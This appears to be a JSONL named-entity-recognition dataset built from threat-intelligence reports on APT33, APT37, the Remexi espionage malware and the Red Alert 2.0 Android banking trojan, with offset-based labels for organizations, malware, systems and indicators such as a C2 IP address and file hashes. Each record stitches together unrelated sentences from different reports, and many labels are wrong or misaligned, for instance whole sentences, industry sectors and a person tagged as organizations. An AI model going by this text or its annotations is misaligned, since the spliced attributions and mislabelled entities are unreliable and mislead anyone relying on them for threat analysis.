{"text": "] com autoandroidup [ . We expect APT33 activity will continue to cover a broad scope of targeted entities , and may spread into other regions and sectors as Iranian interests dictate . Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary . Some hackers are motivated by the sense of achievement that comes with cracking open a major system .", "spans": [{"start": 6, "end": 23, "label": "Indicator"}, {"start": 186, "end": 192, "label": "Malware"}, {"start": 427, "end": 434, "label": "Organization"}]}
{"text": "] website mobilestoreupdate [ . The Elfin espionage group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries . The Remexi developers seem to rely on legitimate Microsoft utilities, which we enumerate in the table below\uff1a extract.exe Deploys modules from the .cab file into the working Event Cache directory, bitsadmin.exe Fetches files from the C2 server to parse and execute . However , even though the employees work for you they may feel the companys property belongs to them , not the business , and may feel justified in theft .", "spans": [{"start": 10, "end": 31, "label": "Indicator"}, {"start": 36, "end": 41, "label": "Organization"}, {"start": 42, "end": 57, "label": "Organization"}, {"start": 64, "end": 69, "label": "Organization"}, {"start": 283, "end": 292, "label": "Organization"}, {"start": 343, "end": 354, "label": "Indicator"}, {"start": 380, "end": 384, "label": "Indicator"}, {"start": 430, "end": 443, "label": "Indicator"}, {"start": 467, "end": 469, "label": "System"}]}
{"text": "] website updatemobapp [ . On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" ( referred to as GroupB in this blog post ) to APT33 , operating at the behest of the Iranian government . Send exfiltrated data, taskkill.exe Ends working cycle of . Dubbing the threat actor TunnelVision , whose TTPs overlap with those of Charming Kitten and Phosphorus , the researchers observed that the group is characterized by the wide exploitation of oneday vulnerabilities in specific regions .", "spans": [{"start": 10, "end": 26, "label": "Indicator"}, {"start": 44, "end": 73, "label": "Organization"}, {"start": 180, "end": 185, "label": "Organization"}, {"start": 263, "end": 275, "label": "Indicator"}, {"start": 325, "end": 337, "label": "Organization"}, {"start": 373, "end": 388, "label": "Organization"}, {"start": 393, "end": 403, "label": "Organization"}]}
{"text": "] website 107 [ . The Elfin group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries . Persistence modules are based on scheduled tasks and system . The request header is included in the binary as follows", "spans": [{"start": 10, "end": 17, "label": "Indicator"}, {"start": 22, "end": 33, "label": "Organization"}, {"start": 40, "end": 45, "label": "Organization"}, {"start": 272, "end": 316, "label": "Malware"}]}
{"text": "] 175 [ . On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" to APT33 , operating at the behest of the Iranian government . Mechanisms vary for different OS . How to locate where stack strings are decoded Every Block of stack strings ends with followed by a .", "spans": [{"start": 27, "end": 56, "label": "Organization"}, {"start": 119, "end": 124, "label": "Organization"}, {"start": 260, "end": 312, "label": "Malware"}]}
{"text": "] 144 [ . APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea . In the case of old Windows versions like XP , main module events.exe runs an edited XPTask.vbs Microsoft sample script to create a weekly scheduled task for . The duration of manipulation may be temporary or longer sustained , depending on operator detection .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 161, "end": 168, "label": "System"}, {"start": 183, "end": 185, "label": "System"}, {"start": 200, "end": 210, "label": "Indicator"}, {"start": 226, "end": 236, "label": "Indicator"}, {"start": 237, "end": 246, "label": "Organization"}]}
{"text": "] 26 192 [ . In 2017 , APT37 expanded its targeting beyond the Korean peninsula to include Japan , Vietnam and the Middle East , and to a wider range of industry verticals , including chemicals , electronics , manufacturing , aerospace , automotive and healthcare entities . For newer operating systems, events.exe creates task.xml . We have not observed indications that the group claiming to be REvil that took part in the attack on the EIB was connected to the widely known ransomware group .", "spans": [{"start": 5, "end": 12, "label": "Indicator"}, {"start": 23, "end": 28, "label": "Organization"}, {"start": 184, "end": 193, "label": "Organization"}, {"start": 196, "end": 207, "label": "Organization"}, {"start": 210, "end": 223, "label": "Organization"}, {"start": 226, "end": 235, "label": "Organization"}, {"start": 238, "end": 248, "label": "Organization"}, {"start": 253, "end": 272, "label": "Organization"}, {"start": 304, "end": 314, "label": "Indicator"}, {"start": 323, "end": 331, "label": "Indicator"}, {"start": 397, "end": 402, "label": "Organization"}, {"start": 439, "end": 442, "label": "Organization"}]}
{"text": "] 64 [ . In 2017 , APT37 targeted a company in Middle East that entered into a joint venture with the North Korean government to provide telecommunications service to the country . To decrypt the configuration data, the malware uses XOR with 25-character keys such as \u201cwaEHleblxiQjoxFJQaIMLdHKz\u201d that are different for every . Additionally , different attackers may have different motivations .", "spans": [{"start": 19, "end": 24, "label": "Organization"}, {"start": 137, "end": 163, "label": "Organization"}]}
{"text": "] 114 [ . While not conclusive by itself , the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33 's familiarity with them and lends support to the assessment that APT33 may be based in Iran . RC4 file encryption relies on the Windows 32 CryptoAPI , using the provided value\u2019s MD5 hash as an initial . Open Babel allows users to \u201c search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , \u201d according to its website , and is used in other popular pieces of software in the science field .", "spans": [{"start": 115, "end": 132, "label": "Organization"}, {"start": 152, "end": 157, "label": "Organization"}, {"start": 224, "end": 229, "label": "Organization"}, {"start": 287, "end": 294, "label": "System"}, {"start": 298, "end": 307, "label": "System"}, {"start": 362, "end": 372, "label": "System"}]}
{"text": "] 147 Red Alert 2.0 : Android Trojan targets security-seekers A malicious , counterfeit version of a VPN client for mobile devices targets security-minded victims with a RAT . North Korean defector and human rights-related targeting provides further evidence that APT37 conducts operations aligned with the interests of North Korea . Among all these random keys once the word \u201csalamati\u201d was also used, which means \u201chealth\u201d in . It has legitimate uses but is widely used by attackers to help map a network .", "spans": [{"start": 6, "end": 19, "label": "Malware"}, {"start": 22, "end": 29, "label": "System"}, {"start": 101, "end": 104, "label": "System"}, {"start": 264, "end": 269, "label": "Organization"}]}
{"text": "Written by Jagadeesh Chandraiah JULY 23 , 2018 SophosLabs has uncovered a mobile malware distribution campaign that uses advertising placement to distribute the Red Alert Trojan , linking counterfeit branding of well-known apps to Web pages that deliver an updated , 2.0 version of this bank credential thief . In 2017 , APT37 targeted a Middle Eastern company that entered into a joint venture with the North Korean government to provide telecommunications service to the country ( read on for a case study ) . Config.ini is the file where the malware stores its encrypted configuration data.List of files to send to C2 using bitsadmin.exe from the dedicated thread: upLog.txt , upSCRLog.txt , upSpecial.txt , upFile.txt , upMSLog.txt . http://108.61.189.174 control server HTTP . The primary motivation of a hacker is money , and getting it can be done with a variety of methods .", "spans": [{"start": 47, "end": 57, "label": "Organization"}, {"start": 161, "end": 177, "label": "Malware"}, {"start": 321, "end": 326, "label": "Organization"}, {"start": 353, "end": 360, "label": "Organization"}, {"start": 439, "end": 465, "label": "Organization"}, {"start": 512, "end": 522, "label": "Indicator"}, {"start": 618, "end": 620, "label": "System"}, {"start": 627, "end": 640, "label": "Indicator"}, {"start": 668, "end": 677, "label": "Indicator"}, {"start": 680, "end": 692, "label": "Indicator"}, {"start": 695, "end": 708, "label": "Indicator"}, {"start": 711, "end": 721, "label": "Indicator"}, {"start": 724, "end": 735, "label": "Indicator"}, {"start": 738, "end": 759, "label": "Indicator"}, {"start": 775, "end": 779, "label": "Indicator"}, {"start": 810, "end": 816, "label": "Organization"}]}
{"text": "The group distributing this family of malware decorates it in the branding and logos of well-known social media or media player apps , system update patches , or ( in its most recent campaign ) VPN client apps in an attempt to lure users into downloading , installing , and elevating the privileges of a Trojanized app hosted on a site not affiliated with any reputable app market or store . APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations . KtJvOXulgibfiHk is the password for uploaded zip . Masked Downloads A malware download , and installation , may be masked by renaming a legitimate Windows system framework such as Powershell.exe to hide from monitoring tools .", "spans": [{"start": 194, "end": 197, "label": "System"}, {"start": 392, "end": 397, "label": "Organization"}, {"start": 409, "end": 424, "label": "Organization"}, {"start": 427, "end": 442, "label": "Organization"}, {"start": 449, "end": 459, "label": "Organization"}, {"start": 523, "end": 546, "label": "Organization"}, {"start": 600, "end": 616, "label": "Indicator"}]}
{"text": "Aside from the inescapable irony of disguising a security-reducing Trojan as an ostensibly security-enhancing app , and the righteous affront to the whole concept of a VPN \u2019 s purpose a Trojan so disguised inspires , this represents an escalation in the variety of app types targeted by this campaign of bankbots in disguise . APT37 distributed SLOWDRIFT malware using a lure referencing the Korea Global Forum against academic and strategic institutions located in South Korea . One of the malware threads checks in an infinite loop if the mouse button was pressed and then also increments the integer iterator . This article is based on research by Marcelo Rivero , Malwarebytes ' ransomware specialist , who monitors information published by ransomware gangs on their Dark Web sites .", "spans": [{"start": 327, "end": 332, "label": "Organization"}, {"start": 345, "end": 362, "label": "System"}, {"start": 419, "end": 427, "label": "Organization"}, {"start": 432, "end": 454, "label": "Organization"}, {"start": 651, "end": 665, "label": "Organization"}, {"start": 668, "end": 704, "label": "Organization"}, {"start": 745, "end": 761, "label": "Organization"}, {"start": 771, "end": 785, "label": "Organization"}]}
{"text": "Red Alert Plays Dress-Up In the wild , we found Web pages designed to ( vaguely ) resemble legitimate app market pages , hosting files for download that have been disguised as a legitimate mobile application of moderately broad appeal , such as a media player or social media app . We believe a organization located in Middle East was targeted by APT37 because it had been involved with a North Korean company and a business deal went bad . If the mouse hooking function registers a button hit, it lets the screenshotting thread know about it through a global . KillNet previously claimed various links to REvil and Conti , which we were unable to verify , including :", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 347, "end": 352, "label": "Organization"}, {"start": 402, "end": 409, "label": "Organization"}, {"start": 606, "end": 611, "label": "Organization"}, {"start": 616, "end": 621, "label": "Organization"}]}
{"text": "But the categories targeted by this group seem to be broadening with the inclusion of VPN software . In one instance , APT37 weaponized a video downloader application with KARAE malware that was indiscriminately distributed to South Korean victims through torrent websites . After that, it checks if the iterator divided by (captureScreenTimeOut/captureActiveWindowTimeOut) has a remainder of . We propose to reach an agreement and conclude a deal .", "spans": [{"start": 86, "end": 89, "label": "System"}, {"start": 119, "end": 124, "label": "Organization"}, {"start": 172, "end": 185, "label": "System"}, {"start": 395, "end": 447, "label": "Indicator"}]}
{"text": "The Web page shown here on the left is hosted on a domain that seems apt : free-vpn [ . FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . In that case, it takes a . The United States is joining with allies and partners to condemn Russia \u2019s destructive cyber activities against Ukraine .", "spans": [{"start": 75, "end": 87, "label": "Indicator"}, {"start": 88, "end": 95, "label": "Organization"}, {"start": 142, "end": 147, "label": "Organization"}, {"start": 160, "end": 194, "label": "Vulnerability"}, {"start": 197, "end": 210, "label": "Vulnerability"}, {"start": 227, "end": 242, "label": "System"}, {"start": 296, "end": 313, "label": "Organization"}, {"start": 361, "end": 399, "label": "Organization"}, {"start": 408, "end": 415, "label": "Organization"}]}
{"text": "] download . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . events.exe : b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31 , c981273c32b581de824e1fd66a19a281 , GCC compiler in MinGW environment version 2.24, I386 Windows GUI EXE . Camouflaging itself as legitimate software , the executable is exceptionally large at 56 MB an unusual size for malware samples that may allow it to avoid detection as vendors typically avoid large file sizes .", "spans": [{"start": 13, "end": 40, "label": "Organization"}, {"start": 87, "end": 92, "label": "Organization"}, {"start": 105, "end": 139, "label": "Vulnerability"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 172, "end": 187, "label": "System"}, {"start": 214, "end": 224, "label": "Indicator"}, {"start": 227, "end": 291, "label": "Indicator"}, {"start": 294, "end": 326, "label": "Indicator"}, {"start": 329, "end": 332, "label": "System"}, {"start": 345, "end": 350, "label": "System"}, {"start": 382, "end": 389, "label": "System"}, {"start": 390, "end": 393, "label": "System"}, {"start": 394, "end": 397, "label": "System"}, {"start": 449, "end": 491, "label": "Indicator"}]}
{"text": "Investigation of this domain led to additional domains that appear to have been registered for use with the campaign , but are not in use yet . In April 2017 , APT37 targeted South Korean military and government organizations with the DOGCALL backdoor and RUHAPPY wiper malware . After checking that the malware is not already installed , it unpacks HCK.cab using the Microsoft standard utility expand.exe . Who is the Winnti group ?", "spans": [{"start": 160, "end": 165, "label": "Organization"}, {"start": 188, "end": 196, "label": "Organization"}, {"start": 201, "end": 225, "label": "Organization"}, {"start": 235, "end": 251, "label": "System"}, {"start": 256, "end": 277, "label": "System"}, {"start": 350, "end": 357, "label": "Indicator"}, {"start": 368, "end": 377, "label": "Organization"}, {"start": 395, "end": 405, "label": "Indicator"}, {"start": 419, "end": 431, "label": "Organization"}]}
{"text": "( You can find additional IoCs at the end of this article ) As you can see , the Web page uses a similar colour scheme as , and the icon design from , a legitimate VPN application ( VPN Proxy Master ) found on the Google Play store . It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations . Splitter.exe : a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff , 1ff40e79d673461cd33bd8b68f8bb5b8 , 2017.08.06 11:32:36 (GMT), I386 Windows Console EXE . We highly suspect the \u201c Pig network \u201d to have also been used as a bulletproof hosting service for cybercriminals who are unrelated to the Winnti group .", "spans": [{"start": 214, "end": 231, "label": "System"}, {"start": 254, "end": 259, "label": "Organization"}, {"start": 279, "end": 292, "label": "System"}, {"start": 512, "end": 524, "label": "Indicator"}, {"start": 527, "end": 591, "label": "Indicator"}, {"start": 594, "end": 626, "label": "Indicator"}, {"start": 661, "end": 668, "label": "System"}, {"start": 669, "end": 676, "label": "System"}, {"start": 677, "end": 680, "label": "System"}, {"start": 707, "end": 718, "label": "System"}, {"start": 749, "end": 776, "label": "System"}, {"start": 821, "end": 833, "label": "Organization"}]}
{"text": "The fake doesn \u2019 t quite nail the app name . We assess with high confidence that APT37 acts in support of the North Korean government and is primarily based in North Korea . Exfiltration is done through the bitsadmin.exe . \u201c And his access was never shut off until today ? , \u201d asked the company \u2019s general counsel Mike Dacks .", "spans": [{"start": 81, "end": 86, "label": "Organization"}, {"start": 207, "end": 220, "label": "Indicator"}, {"start": 287, "end": 313, "label": "Organization"}, {"start": 314, "end": 324, "label": "Organization"}]}
{"text": "In addition to \u201c Free VPN Master Android , \u201d we \u2019 ve observed Red Alert 2.0 Trojans in the wild disguising themselves using names like : Flash Player or Update Flash Player Android Update or Android Antivirus Chrome Update or Google Update Update Google Market WhatsApp Viber OneCoin Wallet Pornhub Tactic FlashLight or PROFlashLight Finanzonline The vast majority of in-the-wild Red Alert 2.0 samples falsely present themselves as Adobe Flash player for Android , a utility that Adobe stopped supporting years ago . The compilation times of APT37 malware is consistent with a developer operating in the North Korea time zone ( UTC +8:30 ) and follows what is believed to be a typical North Korean workday . The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS . They will usually have found your email address via a data breach of a third party .", "spans": [{"start": 17, "end": 40, "label": "System"}, {"start": 62, "end": 75, "label": "Malware"}, {"start": 137, "end": 149, "label": "System"}, {"start": 153, "end": 172, "label": "System"}, {"start": 173, "end": 187, "label": "System"}, {"start": 191, "end": 208, "label": "System"}, {"start": 209, "end": 222, "label": "System"}, {"start": 226, "end": 239, "label": "System"}, {"start": 240, "end": 260, "label": "System"}, {"start": 261, "end": 269, "label": "System"}, {"start": 270, "end": 275, "label": "System"}, {"start": 276, "end": 283, "label": "System"}, {"start": 284, "end": 290, "label": "System"}, {"start": 380, "end": 401, "label": "Malware"}, {"start": 432, "end": 450, "label": "System"}, {"start": 455, "end": 462, "label": "System"}, {"start": 480, "end": 485, "label": "Organization"}, {"start": 542, "end": 555, "label": "System"}, {"start": 712, "end": 716, "label": "System"}, {"start": 745, "end": 755, "label": "System"}, {"start": 774, "end": 784, "label": "System"}, {"start": 924, "end": 952, "label": "Vulnerability"}]}
{"text": "Our logs show a number of simultaneous Red Alert 2.0 campaigns in operation , many ( but not all ) hosted on dynamic DNS domains . The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts . The vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP . The infection starts with a malicious email containing a link that downloads a JS file that used to download DLL .", "spans": [{"start": 26, "end": 62, "label": "Malware"}, {"start": 209, "end": 218, "label": "Organization"}, {"start": 371, "end": 377, "label": "Malware"}, {"start": 432, "end": 518, "label": "Organization"}]}
{"text": "The Red Alert Payload Once installed , the malware requests Device Administrator privileges . Similarly , APT37 targeting of a company located in Middle East in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea . Some of these appear to be foreign diplomatic entities based in the . They once attacked a game server to illicitly farm in - game currency ( \u201c gaming gold \u201d , which also has real - world value ) and stole source codes of online game projects .", "spans": [{"start": 4, "end": 21, "label": "Malware"}, {"start": 106, "end": 111, "label": "Organization"}, {"start": 370, "end": 381, "label": "Organization"}]}
{"text": "If the malware obtains device administrator rights , it will be able to lock the screen by itself , expire the password , and resist being uninstalled through normal methods . Similarly , APT37 targeting of a Middle Eastern company in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea . The Remexi malware has been associated with an APT actor called Chafer by Symantec . As more actors enter this space , Cisco Talos is seeing an increasing number of ransomware variants emerge , leading to more frequent attacks and new challenges for cybersecurity professionals , particularly regarding actor attribution .", "spans": [{"start": 188, "end": 193, "label": "Organization"}, {"start": 224, "end": 231, "label": "Organization"}, {"start": 357, "end": 363, "label": "Malware"}, {"start": 417, "end": 423, "label": "Organization"}, {"start": 427, "end": 435, "label": "Organization"}, {"start": 472, "end": 483, "label": "Organization"}, {"start": 603, "end": 630, "label": "Organization"}]}
{"text": "Device admin request from app that says it is WhatsApp The app then stays in the background listening to commands from the cybercrooks . In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company . One of the human-readable encryption keys used is . Fast forward to 2021 , we ve seen several notable attacks spanning critical infrastructures to the private sector , such as the attack on the information technology firm Kaseya , which affected up to 1,500 businesses and attempted to extort Kaseya for 70 million .", "spans": [{"start": 151, "end": 156, "label": "Organization"}, {"start": 223, "end": 235, "label": "Organization"}, {"start": 256, "end": 273, "label": "Organization"}, {"start": 395, "end": 441, "label": "Organization"}, {"start": 470, "end": 504, "label": "Organization"}, {"start": 569, "end": 575, "label": "Organization"}]}
{"text": "Within some of the first of those commands , the bot typically receives a list of banks it will target . Though they have primarily tapped other tracked suspected North Korean teams to carry out the most aggressive actions , APT37 is an additional tool available to the regime , perhaps even desirable for its relative obscurity . This is probably the Latin spelling for the word \u201chealth\u201d in Farsi . Forbes Technology Council is an invitationonly community for worldclass CIOs , CTOs and technology executives .", "spans": [{"start": 225, "end": 230, "label": "Organization"}, {"start": 400, "end": 425, "label": "Organization"}]}
{"text": "The Trojan works by creating an overlay whenever the user launches the banking application . ScarCruft is a relatively new APT group , victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania . Among the artifacts related to malware authors, we found in the binaries a .pdb path containing the Windows user name \u201cMohamadreza . The discovery of COSMICENERGY illustrates that the barriers to entry for developing offensive OT capabilities are lowering as actors leverage knowledge from prior attacks to develop new malware .", "spans": [{"start": 93, "end": 102, "label": "Organization"}, {"start": 123, "end": 132, "label": "Organization"}, {"start": 308, "end": 312, "label": "Indicator"}, {"start": 333, "end": 340, "label": "System"}, {"start": 383, "end": 395, "label": "Malware"}]}
{"text": "Currently Running Applications Banking Trojans that rely on the overlay mechanism to steal information need to know what application is in the foreground . Certain details , such as using the same infrastructure and targeting , make us believe that Operation Daybreak is being done by the ScarCruft APT group . Interestingly, the FBI website for wanted cybercriminals includes two Iranians called Mohammad Reza, although this could be a common name or even a false . Among the IP addresses owned by Hack520 is a whole/22 IP Range which we dubbed as the \u201c PIG RANGE \u201d .", "spans": [{"start": 289, "end": 298, "label": "Organization"}, {"start": 299, "end": 308, "label": "Organization"}, {"start": 330, "end": 333, "label": "Organization"}, {"start": 499, "end": 506, "label": "Organization"}, {"start": 512, "end": 529, "label": "Indicator"}]}
{"text": "They do this not only to identify whether the use of a particular app may permit them to harvest another credential , but also because each targeted app needs to have an overlay mapped to its design , so the Trojan can intercept and steal user data . Prior to the discovery of Operation Daybreak , we observed the ScarCruft APT launching a series of attacks in Operation Erebus . Activity of the Chafer APT group has been observed since at least 2015 , but based on things like compilation timestamps and C&C registration, it\u2019s possible they have been active for even . McAfee researchers will present their findings at this year 's RSA security conference in San Francisco .", "spans": [{"start": 314, "end": 327, "label": "Organization"}, {"start": 396, "end": 402, "label": "Organization"}, {"start": 570, "end": 588, "label": "Organization"}, {"start": 633, "end": 656, "label": "Organization"}]}
{"text": "This quest to determine the currently running application is a hallmark of overlay malware , so we thought we \u2019 d take a closer look at how it \u2019 s done . Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails . Defeating Compiler-Level Obfuscations Used in APT10 Malware . The group , which was primarily motivated by profit , is noted for utilizing self - developed technically - proficient tools for their attacks .", "spans": [{"start": 214, "end": 223, "label": "Organization"}, {"start": 334, "end": 339, "label": "Organization"}]}
{"text": "To prevent this , Android \u2019 s engineers regularly release updates that contain bug fixes designed to prevent apps from getting the list of currently running apps without explicit permission . Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails . The Carbon Black Threat Analysis Unit ( TAU ) An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or , if the user has the browser extension enabled , by visiting a malicious web page :", "spans": [{"start": 18, "end": 25, "label": "System"}, {"start": 244, "end": 249, "label": "Organization"}, {"start": 314, "end": 351, "label": "Organization"}, {"start": 354, "end": 357, "label": "Organization"}]}
{"text": "With every Android update , the malware authors are forced to come up with new tricks . On occasion the APT37 directly included the ROKRAT payload in the malicious document and during other campaigns the attackers leveraged multi-stage infection processes . recently analyzed a series of malware samples that utilized compiler-level obfuscations . We prefer to keep it secret , we have no goal to destroy your business .", "spans": [{"start": 11, "end": 18, "label": "System"}, {"start": 104, "end": 109, "label": "Organization"}, {"start": 132, "end": 138, "label": "System"}, {"start": 204, "end": 213, "label": "Organization"}, {"start": 348, "end": 418, "label": "Indicator"}]}
{"text": "This particular case is not an exception . In the early part of 2017 , Group123 started the \" Evil New Year \" campaign . For example , The Regin malware platform supports many standard protocols , including SMB.[10 ] Rocke issued wget requests from infected systems to the C2.[11 ] Siloscape connects to an IRC server for C2.[12 ]", "spans": [{"start": 71, "end": 79, "label": "Organization"}, {"start": 139, "end": 161, "label": "System"}, {"start": 207, "end": 214, "label": "System"}, {"start": 217, "end": 222, "label": "Malware"}, {"start": 230, "end": 234, "label": "System"}, {"start": 273, "end": 279, "label": "System"}, {"start": 282, "end": 291, "label": "Malware"}, {"start": 307, "end": 317, "label": "System"}, {"start": 322, "end": 328, "label": "System"}]}
{"text": "The author ( s ) of this malware wrote separate subroutines that identify the operating system version and fire off methods to obtain a list of currently running applications known to work on that particular version of Android . In November 2017 , Talos observed the latest Group123 campaign of the year , which included a new version of ROKRAT being used in the latest wave of attacks . opaque predicates were applied to Turla mosquito and APT10 ANEL . In each case , CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022 - 41040 for initial access .", "spans": [{"start": 219, "end": 226, "label": "System"}, {"start": 248, "end": 253, "label": "Organization"}, {"start": 338, "end": 344, "label": "System"}, {"start": 422, "end": 427, "label": "Organization"}, {"start": 428, "end": 436, "label": "Malware"}, {"start": 441, "end": 446, "label": "Organization"}, {"start": 447, "end": 451, "label": "Malware"}, {"start": 469, "end": 480, "label": "Organization"}, {"start": 564, "end": 580, "label": "Vulnerability"}]}
{"text": "First , they use the built-in toolbox commands to determine what apps are running . Group123 is constantly evolving as the new fileless capability that was added to ROKRAT demonstrates . Another obfuscation , This article is based on research by Marcelo Rivero , Malwarebytes ' ransomware specialist , who monitors information published by ransomware gangs on their Dark Web sites .", "spans": [{"start": 84, "end": 92, "label": "Organization"}, {"start": 165, "end": 171, "label": "System"}, {"start": 246, "end": 260, "label": "Organization"}, {"start": 263, "end": 299, "label": "Organization"}, {"start": 340, "end": 356, "label": "Organization"}, {"start": 366, "end": 380, "label": "System"}]}
{"text": "If that doesn \u2019 t work , they try to use queryUsageStats : When the malware invokes queryUsageStats , it asks for the list of applications that ran in the last 1 million milliseconds ( 16 minutes and 40 seconds ) . In this campaign , the Group123 used a classical HWP document in order to download and execute a previously unknown malware : NavRAT . control flow flattening , COSMICENERGY lacks discovery capabilities , which implies that to successfully execute an attack the malware operator would need to perform some internal reconnaissance to obtain environment information , such as MSSQL server IP addresses , MSSQL credentials , and target IEC-104 device IP addresses .", "spans": [{"start": 238, "end": 246, "label": "Organization"}, {"start": 264, "end": 276, "label": "System"}, {"start": 341, "end": 347, "label": "System"}, {"start": 376, "end": 388, "label": "Malware"}, {"start": 477, "end": 493, "label": "Organization"}]}
{"text": "String Resources Used to Store App Data Red Alert 2.0 stores its data in an atypical location ( inside the Strings.xml file embedded in the app ) to fetch its critical data , such as the C2 address . However , we asses with medium confidence that NavRAT is linked to Group123 . was applied to APT10 ANEL and Dharma ransomware packer . Another area where we may want to consider this motivation is the human factor .", "spans": [{"start": 40, "end": 53, "label": "Malware"}, {"start": 107, "end": 123, "label": "Indicator"}, {"start": 247, "end": 253, "label": "System"}, {"start": 267, "end": 275, "label": "Organization"}, {"start": 293, "end": 298, "label": "Organization"}, {"start": 299, "end": 303, "label": "Malware"}, {"start": 308, "end": 314, "label": "Malware"}]}
{"text": "The com.dsufabunfzs.dowiflubs strings in the screenshot above refer to the internal name this particular malware was given , which in this case was randomized into alphabet salad . APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world 's largest cyber heists . ANEL ( also referred to as UpperCut ) an internal user may have fallen prey to a spear phishing attack ,", "spans": [{"start": 181, "end": 186, "label": "Organization"}, {"start": 227, "end": 246, "label": "Organization"}, {"start": 302, "end": 324, "label": "Organization"}, {"start": 367, "end": 379, "label": "Organization"}, {"start": 382, "end": 386, "label": "Malware"}, {"start": 409, "end": 417, "label": "Malware"}, {"start": 420, "end": 436, "label": "Organization"}]}
{"text": "It \u2019 s been SophosLabs \u2019 observation that Red Alert Trojans usually have a randomized internal name like this . APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world . is a RAT program used by APT10 and observed in Japan uniquely . This is a form of cyber attack used to gain an advantage over a competing organization .", "spans": [{"start": 42, "end": 59, "label": "Malware"}, {"start": 112, "end": 117, "label": "Organization"}, {"start": 158, "end": 177, "label": "Organization"}, {"start": 233, "end": 255, "label": "Organization"}, {"start": 314, "end": 319, "label": "Organization"}]}
{"text": "The strings section of the app contains embedded command-and-control IP addresses , ports , and domain names in plaintext . APT38 is believed to operate more similarly to an espionage operation , carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems . According to SecureWorks , That piece explored how Biderman \u2014 who is Jewish \u2014 had become the target of concerted harassment campaigns by anti - Semitic and far - right groups online in the months leading up to the hack .", "spans": [{"start": 124, "end": 129, "label": "Organization"}, {"start": 251, "end": 273, "label": "Organization"}, {"start": 373, "end": 384, "label": "Organization"}, {"start": 411, "end": 419, "label": "Organization"}, {"start": 497, "end": 534, "label": "Organization"}]}
{"text": "It is an invaluable source of intelligence about a given campaign .. The following snippet shows the location within the Trojan where it uses SQLite database commands to store and recall command-and-control addresses : Backdoor Commands The Red Alert code also contains an embedded list of commands the botmaster can send to the bot . The group has compromised more than 16 organizations in at least 13 different countries , sometimes simultaneously , since at least 2014 . all ANEL samples whose version is 5.3.0 or later are obfuscated with opaque predicates and control flow flattening . The first it Uses and APIs To test for a Debugger attached or Sandbox environment by making a call to with Flag specified , then call to retrieve the addresses of the allocated pages that has been written to since the allocation or the writetrack state has been reset .", "spans": [{"start": 241, "end": 255, "label": "Malware"}, {"start": 339, "end": 344, "label": "Organization"}, {"start": 478, "end": 482, "label": "Malware"}, {"start": 653, "end": 672, "label": "System"}]}
{"text": "The malware can execute a variety of arbitrary commands , including ( for example ) intercepting or sending text messages without the user \u2019 s knowledge , obtaining a copy of the victim \u2019 s Address Book , or call or text message logs , or sending phone network feature codes ( also known as USSD codes ) . APT38 shares malware code and other development resources with TEMP.Hermit North Korean cyber espionage activity , although we consider APT38 . Opaque predicate is a programming term that refers to decision making where there is actually only one path . Compromise usually refers to insider threats .", "spans": [{"start": 190, "end": 202, "label": "System"}, {"start": 306, "end": 311, "label": "Organization"}, {"start": 369, "end": 380, "label": "Organization"}, {"start": 442, "end": 447, "label": "Organization"}]}
{"text": "C2 and Targeted Banks As described earlier , the C2 domain is kept in the app \u2019 s resources . We consider APT38 's operations more global and highly specialized for targeting the financial sector . For example , The code hunted for several security products to evade \u2013 including Kaspersky .", "spans": [{"start": 106, "end": 111, "label": "Organization"}, {"start": 179, "end": 195, "label": "Organization"}, {"start": 240, "end": 257, "label": "Organization"}, {"start": 279, "end": 288, "label": "Organization"}]}
